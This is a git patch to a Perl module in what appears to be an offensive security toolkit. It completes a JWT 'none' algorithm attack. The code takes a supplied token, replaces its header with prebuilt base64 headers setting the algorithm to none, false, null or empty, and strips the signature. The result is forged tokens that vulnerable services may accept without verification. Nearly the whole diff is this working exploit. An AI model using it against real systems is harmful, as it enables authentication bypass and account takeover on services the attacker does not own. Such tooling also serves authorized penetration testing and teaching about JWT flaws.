From 2efcf37becb8dad92d59f005dbacdc06f89c4bd4 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Wed, 4 Dec 2024 09:57:37 +0000 Subject: [PATCH] complete exploit to none attack --- lib/Spellbook/Exploit/None_Attack.pm | 29 +++++++++++++++++++++------- 1 file changed, 22 insertions(+), 7 deletions(-) diff --git a/lib/Spellbook/Exploit/None_Attack.pm b/lib/Spellbook/Exploit/None_Attack.pm index dfc794b..17862c1 100644 --- a/lib/Spellbook/Exploit/None_Attack.pm +++ b/lib/Spellbook/Exploit/None_Attack.pm @@ -1,25 +1,40 @@ package Spellbook::Exploit::None_Attack { use strict; use warnings; - - sub new { + + sub new { my ($self, $parameters) = @_; - my ($help, @result); + my ($help, $token, $attack, @result); Getopt::Long::GetOptionsFromArray ( $parameters, - "h|help" => \$help + "h|help" => \$help, + "token=s" => \$token, + "attack=s" => \$attack ); - if (1) { + if ($token) { + my $attacks = { + none => "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0", + false => "eyJhbGciOmZhbHNlLCJ0eXAiOiJKV1QifQ", + null => "eyJhbGciOm51bGwsInR5cCI6IkpXVCJ9", + empty => "eyJhbGciOiIiLCJ0eXAiOiJKV1QifQ" + }; + + my ($header_b64, $payload_b64, $signature_b64) = split(/\./x, $token); + + push @result, $attacks -> {$attack} . "." . $payload_b64 . "."; + return @result; - } + } if ($help) { return " \rExploit::None_Attack \r===================== - \r-h, --help See this menu\n\n"; + \r-h, --help See this menu + \r--token Define a token to perform attacks + \r--attack Options avaiable: none, false, null and empty\n\n"; } return 0;